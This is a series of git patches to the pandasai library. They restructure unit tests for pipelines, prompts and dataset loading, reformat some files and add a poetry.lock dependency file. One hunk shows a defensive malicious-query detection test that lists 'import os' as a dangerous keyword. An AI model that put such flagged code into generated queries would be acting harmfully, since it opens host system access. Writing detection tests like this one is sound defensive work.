- config = {"llm": llm, "enable_cache": True, "direct_sql": True}
-
- context = PipelineContext([sql_connector], config)
- result = input_validator.execute(input="test", context=context, logger=logger)
- assert isinstance(result, LogicUnitOutput)
- assert result.output == "test"
-
- def test_validate_input_with_direct_sql_true_and_connector_pandasdf(
- self, sample_df, llm, logger, sql_connector
- ):
- input_validator = ValidatePipelineInput()
-
- # context for true config
- config = {"llm": llm, "enable_cache": True, "direct_sql": True}
-
- context = PipelineContext([sample_df, sql_connector], config)
- with pytest.raises(InvalidConfigError):
- input_validator.execute(input="test", context=context, logger=logger)
-
- def test_validate_input_with_direct_sql_true_and_different_type_connector(
- self, pgsql_connector, llm, logger, sql_connector
- ):
- input_validator = ValidatePipelineInput()
-
- # context for true config
- config = {"llm": llm, "enable_cache": True, "direct_sql": True}
-
- context = PipelineContext([pgsql_connector, sql_connector], config)
- with pytest.raises(InvalidConfigError):
- input_validator.execute(input="test", context=context, logger=logger)
diff --git a/tests/unit_tests/pipelines/test_pipeline.py b/tests/unit_tests/pipelines/test_pipeline.py
deleted file mode 100644
index 536e72750..000000000
--- a/tests/unit_tests/pipelines/test_pipeline.py
+++ /dev/null
@@ -1,163 +0,0 @@
-from typing import Any, Optional
-from unittest.mock import Mock
-
-import pandas as pd
-import pytest
-
-from pandasai.dataframe.base import DataFrame
-from pandasai.helpers.logger import Logger
-from pandasai.llm.fake import FakeLLM
-from pandasai.pipelines.base_logic_unit import BaseLogicUnit
-from pandasai.pipelines.pipeline import Pipeline
-from pandasai.pipelines.pipeline_context import PipelineContext
-from pandasai.schemas.df_config import Config
-
-
-class MockLogicUnit(BaseLogicUnit):
- def execute(self, input: Any, **kwargs) -> Any:
- pass
-
-
-class TestPipeline:
- @pytest.fixture
- def llm(self, output: Optional[str] = None):
- return FakeLLM(output=output)
-
- @pytest.fixture
- def sample_df(self):
- return pd.DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def dataframe(self, sample_df):
- return DataFrame(sample_df)
-
- @pytest.fixture
- def config(self, llm):
- return {"llm": llm, "enable_cache": False}
-
- @pytest.fixture
- def context(self, sample_df, config):
- return PipelineContext([sample_df], config)
-
- @pytest.fixture
- def logger(self):
- return Logger(True, False)
-
- def test_init(self, context, config):
- # Test the initialization of the Pipeline
- pipeline = Pipeline(context)
- assert isinstance(pipeline, Pipeline)
- assert pipeline._context.config == Config(**config)
- assert pipeline._context == context
- assert pipeline._steps == []
-
- def test_init_with_agent(self, dataframe, config):
- # Test the initialization of the Pipeline
- pipeline = Pipeline([dataframe], config=config)
- assert isinstance(pipeline, Pipeline)
- assert len(pipeline._context.dfs) == 1
- assert isinstance(pipeline._context.dfs[0], DataFrame)
-
- def test_init_with_dfs(self, dataframe, config):
- # Test the initialization of the Pipeline
- pipeline = Pipeline([dataframe], config=config)
- assert isinstance(pipeline, Pipeline)
- assert len(pipeline._context.dfs) == 1
- assert isinstance(pipeline._context.dfs[0], DataFrame)
-
- def test_add_step(self, context, config):
- # Test the add_step method
- pipeline = Pipeline(context, config=config)
- logic_unit = MockLogicUnit()
- pipeline.add_step(logic_unit)
- assert len(pipeline._steps) == 1
- assert pipeline._steps[0] == logic_unit
-
- def test_add_step_using_constructor(self, context, config):
- logic_unit = MockLogicUnit()
- pipeline = Pipeline(context, steps=[logic_unit])
- assert len(pipeline._steps) == 1
- assert pipeline._steps[0] == logic_unit
-
- def test_add_step_unknown_logic_unit(self, context, config):
- pipeline = Pipeline(context)
- with pytest.raises(Exception):
- pipeline.add_step(Mock())
-
- def test_run(self, context, config):
- # Test the run method
- pipeline = Pipeline(context)
-
- class MockLogicUnit(BaseLogicUnit):
- def execute(self, data, logger, config, context):
- return "MockData"
-
- pipeline.add_step(MockLogicUnit())
- result = pipeline.run("InitialData")
- assert result == "MockData"
-
- def test_run_with_exception(self, context, config):
- # Test the run method with a mock logic unit that raises an exception
- pipeline = Pipeline(context)
-
- class MockLogicUnit(BaseLogicUnit):
- def execute(self, data, logger, config, context):
- raise Exception("Mock exception")
-
- pipeline.add_step(MockLogicUnit())
- with pytest.raises(Exception):
- pipeline.run("InitialData")
-
- def test_run_with_empty_pipeline(self, context, config):
- pipeline_3 = Pipeline(context, [])
- result = pipeline_3.run(5)
- assert result == 5
-
- def test_run_with_multiple_steps(self, context, config):
- class MockLogic(BaseLogicUnit):
- def execute(self, data, logger, config, context):
- return data + 1
-
- pipeline_2 = Pipeline(context, steps=[MockLogic(), MockLogic(), MockLogic()])
-
- result = pipeline_2.run(5)
- assert result == 8
diff --git a/tests/unit_tests/prompts/test_correct_error_prompt.py b/tests/unit_tests/prompts/test_correct_error_prompt.py
index 917d4d2e1..648f189a0 100644
--- a/tests/unit_tests/prompts/test_correct_error_prompt.py
+++ b/tests/unit_tests/prompts/test_correct_error_prompt.py
@@ -6,7 +6,7 @@
from pandasai.dataframe.base import DataFrame
from pandasai.helpers.dataframe_serializer import DataframeSerializerType
from pandasai.llm.fake import FakeLLM
-from pandasai.prompts import CorrectErrorPrompt
+from pandasai.core.prompts.correct_error_prompt import CorrectErrorPrompt
class TestCorrectErrorPrompt:
@@ -21,7 +21,7 @@ def test_str_with_args(self):
config={"llm": llm, "dataframe_serializer": DataframeSerializerType.CSV},
)
prompt = CorrectErrorPrompt(
- context=agent.context, code="df.head()", error="Error message"
+ context=agent._state, code="df.head()", error="Error message"
)
prompt_content = prompt.to_string()
if sys.platform.startswith("win"):
@@ -56,7 +56,7 @@ def test_to_json(self):
config={"llm": llm, "dataframe_serializer": DataframeSerializerType.CSV},
)
prompt = CorrectErrorPrompt(
- context=agent.context, code="df.head()", error="Error message"
+ context=agent._state, code="df.head()", error="Error message"
)
assert prompt.to_json() == {
diff --git a/tests/unit_tests/prompts/test_generate_python_code_prompt.py b/tests/unit_tests/prompts/test_generate_python_code_prompt.py
index c01cd111c..a1e630d5e 100644
--- a/tests/unit_tests/prompts/test_generate_python_code_prompt.py
+++ b/tests/unit_tests/prompts/test_generate_python_code_prompt.py
@@ -10,7 +10,7 @@
from pandasai.dataframe.base import DataFrame
from pandasai.helpers.dataframe_serializer import DataframeSerializerType
from pandasai.llm.fake import FakeLLM
-from pandasai.prompts import GeneratePythonCodePrompt
+from pandasai.core.prompts.generate_python_code import GeneratePythonCodePrompt
class TestGeneratePythonCodePrompt:
@@ -63,7 +63,7 @@ def test_str_with_args(self, output_type, output_type_template):
config={"llm": llm, "dataframe_serializer": DataframeSerializerType.CSV},
)
prompt = GeneratePythonCodePrompt(
- context=agent.context,
+ context=agent._state,
output_type=output_type,
)
@@ -129,7 +129,7 @@ def test_str_with_args(self, output_type, output_type_template):
]
],
)
- @patch("pandasai.vectorstores.bamboo_vectorstore.BambooVectorStore")
+ @patch("pandasai.vectorstores.VectorStore")
def test_str_with_train_qa(self, chromadb_mock, output_type, output_type_template):
"""Test casting of prompt to string and interpolation of context.
@@ -150,10 +150,11 @@ def test_str_with_train_qa(self, chromadb_mock, output_type, output_type_templat
agent = Agent(
DataFrame({"a": [1], "b": [4]}),
config={"llm": llm, "dataframe_serializer": DataframeSerializerType.CSV},
+ vectorstore=chromadb_instance,
)
agent.train(["query1"], ["code1"])
prompt = GeneratePythonCodePrompt(
- context=agent.context,
+ context=agent._state,
output_type=output_type,
)
@@ -225,7 +226,7 @@ def test_str_with_train_qa(self, chromadb_mock, output_type, output_type_templat
]
],
)
- @patch("pandasai.vectorstores.bamboo_vectorstore.BambooVectorStore")
+ @patch("pandasai.vectorstores.VectorStore")
def test_str_with_train_docs(
self, chromadb_mock, output_type, output_type_template
):
@@ -249,7 +250,7 @@ def test_str_with_train_docs(
)
agent.train(docs=["document1"])
prompt = GeneratePythonCodePrompt(
- context=agent.context,
+ context=agent._state,
output_type=output_type,
)
@@ -321,7 +322,7 @@ def test_str_with_train_docs(
]
],
)
- @patch("pandasai.vectorstores.bamboo_vectorstore.BambooVectorStore")
+ @patch("pandasai.vectorstores.VectorStore")
def test_str_with_train_docs_and_qa(
self, chromadb_mock, output_type, output_type_template
):
@@ -349,7 +350,7 @@ def test_str_with_train_docs_and_qa(
)
agent.train(queries=["query1"], codes=["code1"], docs=["document1"])
prompt = GeneratePythonCodePrompt(
- context=agent.context,
+ context=agent._state,
output_type=output_type,
)
@@ -395,7 +396,7 @@ def test_str_with_train_docs_and_qa(
assert actual_prompt_content == expected_prompt_content
- @patch("pandasai.vectorstores.bamboo_vectorstore.BambooVectorStore")
+ @patch("pandasai.vectorstores.VectorStore")
def test_str_geenerate_code_prompt_to_json(self, chromadb_mock):
"""Test casting of prompt to string and interpolation of context.
@@ -418,7 +419,7 @@ def test_str_geenerate_code_prompt_to_json(self, chromadb_mock):
)
agent.train(queries=["query1"], codes=["code1"], docs=["document1"])
prompt = GeneratePythonCodePrompt(
- context=agent.context, viz_lib="", output_type=None
+ context=agent._state, viz_lib="", output_type=None
)
prompt_json = prompt.to_json()
if sys.platform.startswith("win"):
@@ -459,7 +460,7 @@ def test_str_geenerate_code_prompt_to_json(self, chromadb_mock):
]
],
)
- @patch("pandasai.vectorstores.bamboo_vectorstore.BambooVectorStore")
+ @patch("pandasai.vectorstores.VectorStore")
def test_str_relations(self, chromadb_mock, output_type, output_type_template):
"""Test casting of prompt to string and interpolation of context.
@@ -484,7 +485,7 @@ def test_str_relations(self, chromadb_mock, output_type, output_type_template):
)
agent.train(["query1"], ["code1"])
prompt = GeneratePythonCodePrompt(
- context=agent.context,
+ context=agent._state,
output_type=output_type,
)
diff --git a/tests/unit_tests/prompts/test_sql_prompt.py b/tests/unit_tests/prompts/test_sql_prompt.py
index 97b8be7be..bceee84bc 100644
--- a/tests/unit_tests/prompts/test_sql_prompt.py
+++ b/tests/unit_tests/prompts/test_sql_prompt.py
@@ -9,7 +9,7 @@
from pandasai import Agent
from pandasai.helpers.dataframe_serializer import DataframeSerializerType
from pandasai.llm.fake import FakeLLM
-from pandasai.prompts.generate_python_code_with_sql import (
+from pandasai.core.prompts.generate_python_code_with_sql import (
GeneratePythonCodeWithSQLPrompt,
)
@@ -53,28 +53,26 @@ def test_str_with_args(self, output_type, output_type_template):
llm = FakeLLM()
agent = Agent(
pai.DataFrame(),
- config={"llm": llm, "dataframe_serializer": DataframeSerializerType.YML},
+ config={"llm": llm},
)
prompt = GeneratePythonCodeWithSQLPrompt(
- context=agent.context,
+ context=agent._state,
output_type=output_type,
)
prompt_content = prompt.to_string()
if sys.platform.startswith("win"):
prompt_content = prompt_content.replace("\r\n", "\n")
+ print(prompt_content)
+
assert (
prompt_content
== f'''
-dfs[0]:
- name: null
- description: null
- type: pd.DataFrame
- rows: 0
- columns: 0
- schema:
- fields: []
+
+dfs[0]:0x0
+
+
diff --git a/tests/unit_tests/responses/test_response_serializer.py b/tests/unit_tests/responses/test_response_serializer.py
deleted file mode 100644
index 1d363061a..000000000
--- a/tests/unit_tests/responses/test_response_serializer.py
+++ /dev/null
@@ -1,34 +0,0 @@
-import unittest
-
-import pandas as pd
-
-from pandasai.responses.response_serializer import ResponseSerializer
-
-
-class TestResponseSerializer(unittest.TestCase):
- def setUp(self) -> None:
- self.serializer = ResponseSerializer()
- self.df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
- self.series = pd.Series([1, 2, 3])
- self.response_type_df = {"type": "dataframe", "value": self.df}
- self.response_type_series = {"type": "dataframe", "value": self.series}
- self.response_type_plot = {"type": "plot", "value": "path_to_image.png"}
-
- def test_serialize_dataframe(self) -> None:
- result = self.serializer.serialize_dataframe(self.df)
- self.assertEqual(result["headers"], list(self.df.columns))
- self.assertEqual(result["rows"], self.df.values.tolist())
-
- def test_serialize_dataframe_from_series(self) -> None:
- result = self.serializer.serialize(self.response_type_series)
- self.assertEqual(
- result["value"]["headers"], list(self.series.to_frame().columns)
- )
- self.assertEqual(
- result["value"]["rows"], self.series.to_frame().values.tolist()
- )
-
- def test_serialize_dataframe_from_df(self) -> None:
- result = self.serializer.serialize(self.response_type_df)
- self.assertEqual(result["value"]["headers"], list(self.df.columns))
- self.assertEqual(result["value"]["rows"], self.df.values.tolist())
diff --git a/tests/unit_tests/schemas/__init__.py b/tests/unit_tests/schemas/__init__.py
deleted file mode 100644
index e69de29bb..000000000
diff --git a/tests/unit_tests/schemas/test_df_config.py b/tests/unit_tests/schemas/test_df_config.py
deleted file mode 100644
index 57431e188..000000000
--- a/tests/unit_tests/schemas/test_df_config.py
+++ /dev/null
@@ -1,18 +0,0 @@
-import os
-
-from pandasai.llm.bamboo_llm import BambooLLM
-from pandasai.schemas.df_config import Config
-
-
-def test_config_llm_default_type() -> None:
- # Define a mock environment for testing
- os.environ["PANDASAI_API_URL"] = "http://test-server"
- os.environ["PANDASAI_API_KEY"] = "test-api-key"
-
- # Create an instance of Config without any arguments
- config = Config()
-
- # Assert that the llm attribute is an instance of the expected default type (BambooLLM)
- assert isinstance(
- config.llm, BambooLLM
- ), "Default LLM type should be BambooLLM when Config is instantiated without arguments."
diff --git a/tests/unit_tests/test_pandasai_init.py b/tests/unit_tests/test_pandasai_init.py
index f834d162d..472de1618 100644
--- a/tests/unit_tests/test_pandasai_init.py
+++ b/tests/unit_tests/test_pandasai_init.py
@@ -1,8 +1,9 @@
+import pandas
import pytest
from unittest.mock import patch, MagicMock
import pandasai
from pandasai.dataframe.base import DataFrame
-import pandas as pd
+from pandasai.exceptions import DatasetNotFound, PandasAIApiKeyError
class TestPandasAIInit:
@@ -67,17 +68,93 @@ def test_chat_with_single_dataframe(self, sample_dataframes):
)
assert result == "Mocked response"
- def test_load(self):
- with patch("pandasai.DatasetLoader.load") as mock_load:
- mock_load.return_value = DataFrame(
- pd.DataFrame({"email": ["test@example.com"]})
- )
-
- result = pandasai.load("test/users")
-
- assert isinstance(result, DataFrame)
- assert "email" in result.columns
- mock_load.assert_called_once_with("test/users")
+ @patch("pandasai.data_loader.loader.DatasetLoader")
+ @patch("pandasai.helpers.path.find_project_root")
+ @patch("os.path.exists")
+ def test_load_valid_dataset(
+ self, mock_exists, mock_find_project_root, mock_dataset_loader
+ ):
+ """Test loading a valid dataset."""
+ mock_find_project_root.return_value = "/mock/root"
+ mock_dataset_loader.load.return_value = MagicMock(name="DataFrame")
+ mock_exists.return_value = True
+ pandasai._dataset_loader = mock_dataset_loader
+
+ dataset_path = "org/dataset_name"
+ result = pandasai.load(dataset_path)
+
+ mock_dataset_loader.load.assert_called_once_with(dataset_path, False)
+ assert isinstance(result, MagicMock)
+
+ @patch("zipfile.ZipFile")
+ @patch("io.BytesIO")
+ @patch("os.environ")
+ def test_load_dataset_not_found(self, mockenviron, mock_bytes_io, mock_zip_file):
+ """Test loading when dataset does not exist locally and API returns not found."""
+ mockenviron.return_value = {"PANDASAI_API_URL": "localhost:8000"}
+ mock_request_session = MagicMock()
+ pandasai.get_pandaai_session = mock_request_session
+ pandasai.get_pandaai_session.return_value = MagicMock()
+ mock_request_session.get.return_value.status_code = 404
+
+ dataset_path = "org/dataset_name"
+
+ with pytest.raises(DatasetNotFound) as cm:
+ pandasai.load(dataset_path)
+
+ @patch("pandasai.os.path.exists")
+ @patch("pandasai.os.environ", {"PANDASAI_API_URL": "url"})
+ def test_load_missing_api_key(self, mock_exists):
+ """Test loading when API key is missing."""
+ mock_exists.return_value = False
+ dataset_path = "org/dataset_name"
+
+ with pytest.raises(PandasAIApiKeyError):
+ pandasai.load(dataset_path)
+
+ @patch("pandasai.os.path.exists")
+ @patch("pandasai.os.environ", {"PANDASAI_API_KEY": "key"})
+ def test_load_missing_api_url(self, mock_exists):
+ """Test loading when API URL is missing."""
+ mock_exists.return_value = False
+ dataset_path = "org/dataset_name"
+
+ with pytest.raises(PandasAIApiKeyError):
+ pandasai.load(dataset_path)
+
+ @patch("pandasai.os.environ", new_callable=dict)
+ @patch("pandasai.os.path.exists")
+ @patch("pandasai.get_pandaai_session")
+ @patch("pandasai.ZipFile")
+ @patch("pandasai.BytesIO")
+ @patch("pandasai.data_loader.loader.DatasetLoader")
+ def test_load_successful_zip_extraction(
+ self,
+ mock_dataset_loader,
+ mock_bytes_io,
+ mock_zip_file,
+ mock_get_pandaai_session,
+ mock_exists,
+ mock_os_environ,
+ ):
+ """Test loading when dataset is not found locally but is successfully downloaded."""
+ mock_exists.return_value = False
+ mock_os_environ.update({"PANDASAI_API_KEY": "key", "PANDASAI_API_URL": "url"})
+ mock_request_session = MagicMock()
+ mock_get_pandaai_session.return_value = mock_request_session
+ mock_request_session.get.return_value.status_code = 200
+ mock_request_session.get.return_value.content = b"mock zip content"
+ pandasai._dataset_loader = mock_dataset_loader
+
+ dataset_path = "org/dataset_name"
+
+ # Mock the zip file extraction
+ mock_zip_file.return_value.__enter__.return_value.extractall = MagicMock()
+
+ result = pandasai.load(dataset_path)
+
+ mock_zip_file.return_value.__enter__.return_value.extractall.assert_called_once()
+ assert isinstance(result, MagicMock)
def test_clear_cache(self):
with patch("pandasai.helpers.cache.Cache.clear") as mock_clear:
From 6afb61dfdbbee5877997acc65519afa82cad2642 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 11:32:36 +0100
Subject: [PATCH 20/58] ruff changes
---
tests/unit_tests/agent/test_agent.py | 1 -
tests/unit_tests/core/code_generation/test_code_cleaning.py | 1 -
2 files changed, 2 deletions(-)
diff --git a/tests/unit_tests/agent/test_agent.py b/tests/unit_tests/agent/test_agent.py
index 84db923a5..632a68e5f 100644
--- a/tests/unit_tests/agent/test_agent.py
+++ b/tests/unit_tests/agent/test_agent.py
@@ -455,7 +455,6 @@ def test_malicious_query_detection(self, sample_df, config):
)
def test_query_detection(self, sample_df, config, agent: Agent):
-
# Positive cases: should detect malicious keywords
malicious_queries = [
"import os",
diff --git a/tests/unit_tests/core/code_generation/test_code_cleaning.py b/tests/unit_tests/core/code_generation/test_code_cleaning.py
index 39c077d39..0bb433d03 100644
--- a/tests/unit_tests/core/code_generation/test_code_cleaning.py
+++ b/tests/unit_tests/core/code_generation/test_code_cleaning.py
@@ -8,7 +8,6 @@
class TestCodeCleaner(unittest.TestCase):
-
def setUp(self):
# Setup a mock context for CodeCleaner
self.context = MagicMock(spec=AgentState)
From 28bb719c0760909d5670052ea935ba7eb03dcb99 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 11:33:47 +0100
Subject: [PATCH 21/58] add poetry lock file
---
poetry.lock | 2589 +++++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 2589 insertions(+)
create mode 100644 poetry.lock
diff --git a/poetry.lock b/poetry.lock
new file mode 100644
index 000000000..a5f68c583
--- /dev/null
+++ b/poetry.lock
@@ -0,0 +1,2589 @@
+# This file is automatically @generated by Poetry 1.8.5 and should not be changed by hand.
+
+[[package]]
+name = "annotated-types"
+version = "0.7.0"
+description = "Reusable constraint types to use with typing.Annotated"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "annotated_types-0.7.0-py3-none-any.whl", hash = "sha256:1f02e8b43a8fbbc3f3e0d4f0f4bfc8131bcb4eebe8849b8e5c773f3a1c582a53"},
+ {file = "annotated_types-0.7.0.tar.gz", hash = "sha256:aff07c09a53a08bc8cfccb9c85b05f1aa9a2a6f23728d790723543408344ce89"},
+]
+
+[package.dependencies]
+typing-extensions = {version = ">=4.0.0", markers = "python_version < \"3.9\""}
+
+[[package]]
+name = "astor"
+version = "0.8.1"
+description = "Read/rewrite/write Python ASTs"
+optional = false
+python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,>=2.7"
+files = [
+ {file = "astor-0.8.1-py2.py3-none-any.whl", hash = "sha256:070a54e890cefb5b3739d19f30f5a5ec840ffc9c50ffa7d23cc9fc1a38ebbfc5"},
+ {file = "astor-0.8.1.tar.gz", hash = "sha256:6a6effda93f4e1ce9f618779b2dd1d9d84f1e32812c23a29b3fff6fd7f63fa5e"},
+]
+
+[[package]]
+name = "astunparse"
+version = "1.6.3"
+description = "An AST unparser for Python"
+optional = false
+python-versions = "*"
+files = [
+ {file = "astunparse-1.6.3-py2.py3-none-any.whl", hash = "sha256:c2652417f2c8b5bb325c885ae329bdf3f86424075c4fd1a128674bc6fba4b8e8"},
+ {file = "astunparse-1.6.3.tar.gz", hash = "sha256:5ad93a8456f0d084c3456d059fd9a92cce667963232cbf763eac3bc5b7940872"},
+]
+
+[package.dependencies]
+six = ">=1.6.1,<2.0"
+wheel = ">=0.23.0,<1.0"
+
+[[package]]
+name = "beautifulsoup4"
+version = "4.12.3"
+description = "Screen-scraping library"
+optional = true
+python-versions = ">=3.6.0"
+files = [
+ {file = "beautifulsoup4-4.12.3-py3-none-any.whl", hash = "sha256:b80878c9f40111313e55da8ba20bdba06d8fa3969fc68304167741bbf9e082ed"},
+ {file = "beautifulsoup4-4.12.3.tar.gz", hash = "sha256:74e3d1928edc070d21748185c46e3fb33490f22f52a3addee9aee0f4f7781051"},
+]
+
+[package.dependencies]
+soupsieve = ">1.2"
+
+[package.extras]
+cchardet = ["cchardet"]
+chardet = ["chardet"]
+charset-normalizer = ["charset-normalizer"]
+html5lib = ["html5lib"]
+lxml = ["lxml"]
+
+[[package]]
+name = "certifi"
+version = "2024.12.14"
+description = "Python package for providing Mozilla's CA Bundle."
+optional = false
+python-versions = ">=3.6"
+files = [
+ {file = "certifi-2024.12.14-py3-none-any.whl", hash = "sha256:1275f7a45be9464efc1173084eaa30f866fe2e47d389406136d332ed4967ec56"},
+ {file = "certifi-2024.12.14.tar.gz", hash = "sha256:b650d30f370c2b724812bee08008be0c4163b163ddaec3f2546c1caf65f191db"},
+]
+
+[[package]]
+name = "cfgv"
+version = "3.4.0"
+description = "Validate configuration and produce human readable error messages."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "cfgv-3.4.0-py2.py3-none-any.whl", hash = "sha256:b7265b1f29fd3316bfcd2b330d63d024f2bfd8bcb8b0272f8e19a504856c48f9"},
+ {file = "cfgv-3.4.0.tar.gz", hash = "sha256:e52591d4c5f5dead8e0f673fb16db7949d2cfb3f7da4582893288f0ded8fe560"},
+]
+
+[[package]]
+name = "charset-normalizer"
+version = "3.4.1"
+description = "The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet."
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "charset_normalizer-3.4.1-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:91b36a978b5ae0ee86c394f5a54d6ef44db1de0815eb43de826d41d21e4af3de"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:7461baadb4dc00fd9e0acbe254e3d7d2112e7f92ced2adc96e54ef6501c5f176"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:e218488cd232553829be0664c2292d3af2eeeb94b32bea483cf79ac6a694e037"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:80ed5e856eb7f30115aaf94e4a08114ccc8813e6ed1b5efa74f9f82e8509858f"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b010a7a4fd316c3c484d482922d13044979e78d1861f0e0650423144c616a46a"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4532bff1b8421fd0a320463030c7520f56a79c9024a4e88f01c537316019005a"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-musllinux_1_2_aarch64.whl", hash = "sha256:d973f03c0cb71c5ed99037b870f2be986c3c05e63622c017ea9816881d2dd247"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-musllinux_1_2_i686.whl", hash = "sha256:3a3bd0dcd373514dcec91c411ddb9632c0d7d92aed7093b8c3bbb6d69ca74408"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-musllinux_1_2_ppc64le.whl", hash = "sha256:d9c3cdf5390dcd29aa8056d13e8e99526cda0305acc038b96b30352aff5ff2bb"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-musllinux_1_2_s390x.whl", hash = "sha256:2bdfe3ac2e1bbe5b59a1a63721eb3b95fc9b6817ae4a46debbb4e11f6232428d"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:eab677309cdb30d047996b36d34caeda1dc91149e4fdca0b1a039b3f79d9a807"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-win32.whl", hash = "sha256:c0429126cf75e16c4f0ad00ee0eae4242dc652290f940152ca8c75c3a4b6ee8f"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-win_amd64.whl", hash = "sha256:9f0b8b1c6d84c8034a44893aba5e767bf9c7a211e313a9605d9c617d7083829f"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:8bfa33f4f2672964266e940dd22a195989ba31669bd84629f05fab3ef4e2d125"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:28bf57629c75e810b6ae989f03c0828d64d6b26a5e205535585f96093e405ed1"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f08ff5e948271dc7e18a35641d2f11a4cd8dfd5634f55228b691e62b37125eb3"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:234ac59ea147c59ee4da87a0c0f098e9c8d169f4dc2a159ef720f1a61bbe27cd"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fd4ec41f914fa74ad1b8304bbc634b3de73d2a0889bd32076342a573e0779e00"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:eea6ee1db730b3483adf394ea72f808b6e18cf3cb6454b4d86e04fa8c4327a12"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:c96836c97b1238e9c9e3fe90844c947d5afbf4f4c92762679acfe19927d81d77"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-musllinux_1_2_i686.whl", hash = "sha256:4d86f7aff21ee58f26dcf5ae81a9addbd914115cdebcbb2217e4f0ed8982e146"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-musllinux_1_2_ppc64le.whl", hash = "sha256:09b5e6733cbd160dcc09589227187e242a30a49ca5cefa5a7edd3f9d19ed53fd"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-musllinux_1_2_s390x.whl", hash = "sha256:5777ee0881f9499ed0f71cc82cf873d9a0ca8af166dfa0af8ec4e675b7df48e6"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:237bdbe6159cff53b4f24f397d43c6336c6b0b42affbe857970cefbb620911c8"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-win32.whl", hash = "sha256:8417cb1f36cc0bc7eaba8ccb0e04d55f0ee52df06df3ad55259b9a323555fc8b"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-win_amd64.whl", hash = "sha256:d7f50a1f8c450f3925cb367d011448c39239bb3eb4117c36a6d354794de4ce76"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-macosx_10_13_universal2.whl", hash = "sha256:73d94b58ec7fecbc7366247d3b0b10a21681004153238750bb67bd9012414545"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:dad3e487649f498dd991eeb901125411559b22e8d7ab25d3aeb1af367df5efd7"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c30197aa96e8eed02200a83fba2657b4c3acd0f0aa4bdc9f6c1af8e8962e0757"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2369eea1ee4a7610a860d88f268eb39b95cb588acd7235e02fd5a5601773d4fa"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bc2722592d8998c870fa4e290c2eec2c1569b87fe58618e67d38b4665dfa680d"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ffc9202a29ab3920fa812879e95a9e78b2465fd10be7fcbd042899695d75e616"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:804a4d582ba6e5b747c625bf1255e6b1507465494a40a2130978bda7b932c90b"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-musllinux_1_2_i686.whl", hash = "sha256:0f55e69f030f7163dffe9fd0752b32f070566451afe180f99dbeeb81f511ad8d"},
